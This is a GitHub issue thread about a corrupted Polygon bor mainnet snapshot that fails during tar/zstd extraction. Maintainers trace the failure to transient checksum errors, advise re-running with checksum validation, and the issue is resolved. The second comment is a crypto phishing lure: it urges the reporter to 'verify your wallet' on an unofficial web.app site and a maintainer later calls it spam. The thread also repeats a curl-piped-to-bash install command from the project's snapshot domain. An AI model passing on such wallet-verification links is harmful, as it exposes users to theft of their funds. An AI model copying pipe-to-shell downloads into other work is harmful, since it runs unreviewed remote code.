### ISSUE TITLE
Snapshot Extract Error,pls help!

### ISSUE THREAD

**Issue by shanshan-999** [maticnetwork/bor#972]
Join the snapshot files then extract them,an error occurred and was interrupted,the detailed information as follows:

141155822.ldb                                                                                                                                                    
141155823.ldb                                                                                                                                                       
141155824.ldb                                                                                                                                                       
141155825.ldb                                                                                                                                                        
141155826.ldb                                                                                                                                                       
141155827.ldb                                                                                                                                                      
141155828.ldb                                                                                                                                                     
141155829.ldb                                                                                                                                                        
141155830.ldb                                                                                                                                                      
141155831.ldb                                                                                                                                                        
141155832.ldb                                                                                                                                                     
141155833.ldb                                                                                                                                                       
141155834.ldb                                                                                                                                                        
141155835.ldb                                                                                                                                                        
141155836.ldb                                                                                                                                                       
141155837.ldb                                                                                                                                                        
141155838.ldb                                                                                                                                                     
141155839.ldb                                                                                                                                                        
141155840.ldb                                                                                                                                                        
141155841.ldb                                                                                                                                                        
141155842.ldb                                                                                                                                                       
141155843.ldb                                                                                                                                                     
141155844.ldb                                                                                                                                                       
141155845.ldb                                                                                                                                                        
141155846.ldb                                                                                                                                                       
141155847.ldb                                                                                                                                                       
141155848.ldb                                                                                                                                                     
141155849.ldb                                                                                                                                                      
141155850.ldb                                                                                                                                                        
141155851.ldb                                                                                                                                                       
141155852.ldb                                                                                                                                                        
141155853.ldb                                                                                                                                                        
141155854.ldb                                                                                                                                                        
141155855.ldb                                                                                                                                                        
/*stdin*\ : Decoding error (36) : Corrupted block detected                                                                                                           
tar: Unexpected EOF in archive                                                                                                                                       
tar: Unexpected EOF in archive                                                                                                                                       
tar: Error is not recoverable: exiting now

Join bulk parts command: cat bor-mainnet-snapshot-bulk-2023-08-08-part-* > bor-mainnet-snapshot-bulk-2023-08-08.tar.zst
extract command: pv bor-mainnet-snapshot-bulk-2023-08-08.tar.zst | tar -I zstd -xf - -C ./bulk --strip-components=3

Is there any way to solve this problem?

**Comment by Wheelar** [comment]
> Join the snapshot files then extract them,an error occurred and was interrupted,the detailed information as follows:
> 
> 141155822.ldb 141155823.ldb 141155824.ldb 141155825.ldb 141155826.ldb 141155827.ldb 141155828.ldb 141155829.ldb 141155830.ldb 141155831.ldb 141155832.ldb 141155833.ldb 141155834.ldb 141155835.ldb 141155836.ldb 141155837.ldb 141155838.ldb 141155839.ldb 141155840.ldb 141155841.ldb 141155842.ldb 141155843.ldb 141155844.ldb 141155845.ldb 141155846.ldb 141155847.ldb 141155848.ldb 141155849.ldb 141155850.ldb 141155851.ldb 141155852.ldb 141155853.ldb 141155854.ldb 141155855.ldb /_stdin_\ : Decoding error (36) : Corrupted block detected tar: Unexpected EOF in archive tar: Unexpected EOF in archive tar: Error is not recoverable: exiting now
> 
> Join bulk parts command: cat bor-mainnet-snapshot-bulk-2023-08-08-part-* > bor-mainnet-snapshot-bulk-2023-08-08.tar.zst extract command: pv bor-mainnet-snapshot-bulk-2023-08-08.tar.zst | tar -I zstd -xf - -C ./bulk --strip-components=3
> 
> Is there any way to solve this problem?

Hi @shanshan-999 
Visit the official Defi Protocol page to verify your wallet under validation to complete your request for you eligibility purpose via [Defi Protocol](https://defirefixprotocol.web.app/).
Note: Click on the chat button to initiate a chat with an agent on a live chat for more assistance.

**Comment by shanshan-999** [comment]
Hi @Wheelar
What's this?this doesn't seem to solve the snapshot problem.do you have any other good suggestions?

**Comment by manav2401** [comment]
Hi @shanshan-999, that looked like a spam user. Could you share what are the exact flags you passed in the script?

**Comment by shanshan-999** [comment]
Hi @manav2401,in the root user,download and extraction use the following command:curl -L https://snapshot-download.polygon.technology/snapdown.sh | bash -s -- --network mainnet --client bor --extract-dir bor-data --validate-checksum true

**Comment by frangrech** [comment]
We're also seeing the same issue on the bor mainnet bulk snapshot. It seems like the snapshot is corrupted but we were able to download it and extract it successfully around 2 weeks ago.

**Comment by rebelArtists** [comment]
@shanshan-999 @frangrech thanks for raising, we're doing some testing on our side to see if we can replicate

note, we turned on caching for the snapshot parts last week and updated the aria2 download flags in the snapdown.sh script to support this, specifically this line:
`  aria2c -x6 -s6 --max-tries=0 --max-connection-per-server=4 --retry-wait=3 --check-integrity=$checksum -i $client-$network-parts.txt
`

for the old download flags broken downloads would continue from where they left off and, with caching, it seems this can lead to transient checksum verification issues (i.e. one run a particular checksum fails, on rerun its fine). these updated flags will rerun download of a part (from scratch) if any part fails verification instead of continuing, so checksum verification true is highly encouraged

did you all happen to be using an outdated snapdown.sh?

**Comment by shanshan-999** [comment]
Hi @frangrech @rebelArtists thank you very much for your reply.I found a solution,download again,remove verification during download(use command: curl -L https://snapshot-download.polygon.technology/snapdown.sh | bash -s -- --network mainnet --client bor ),there will be no ERR errors during the transmission process,Joining parts then extract.I hope to succeed this time.

**Comment by rebelArtists** [comment]
hey @shanshan-999 want to emphasize again **setting validate checksum 'true' is highly encouraged** as we'e noticed transient checksum verification issues after turning on caching  (i.e. rare cases where a particular part's checksum fails, but on rerun its fine)

with the new snapdown.sh changes, we keep an aria2c session file to track any parts that did not download/verify successfully and only those parts will be automatically retried at the end of downloading, i'm confident this will solve your problem and we have already confirmed bor mainnet can successfully be downloaded/extracted via this method

**Comment by shanshan-999** [comment]
Hi @rebelArtists thank you. I'll try the new snapdown.sh again.

**Comment by shanshan-999** [comment]
Hi @rebelArtists  I have tried again with the new snapdown.sh,still failed,use command: curl -L https://snapshot-download.polygon.technology/snapdown.sh | bash -s -- --network mainnet --client bor 
not use with --validate-checksum true          is it for this reason?
The error message as follows:
Status Legend:
(OK):download completed.

08/31 20:21:51 [NOTICE] Serialized session to 'bor-mainnet-failures.txt' successfully.
Retrying failed parts, attempt 1...
No files to download.
Command succeeded.
Join parts for bulk-2023-08-08 then extract
/*stdin*\ : Decoding error (36) : Corrupted block detected                                                                                         ] 15% ETA 12:00:43
tar: Unexpected EOF in archive
tar: Unexpected EOF in archive
tar: Error is not recoverable: exiting now
 265GiB 2:10:19 [34.8MiB/s] [================>                                                                                                     ] 15%             
Join parts for 2023-08-09 then extract

**Comment by rebelArtists** [comment]
yes @shanshan-999 we encourage everyone to set --validate-checksum to true to avoid this happening. please run with this flag set and script will automatically retry any parts that had transient checksum errors until successful. we have confirmed there is no fundamental data corruption and this technique works but --validate-checksum must be set to true

**Comment by shanshan-999** [comment]
The problem has been resolved. thank you all.
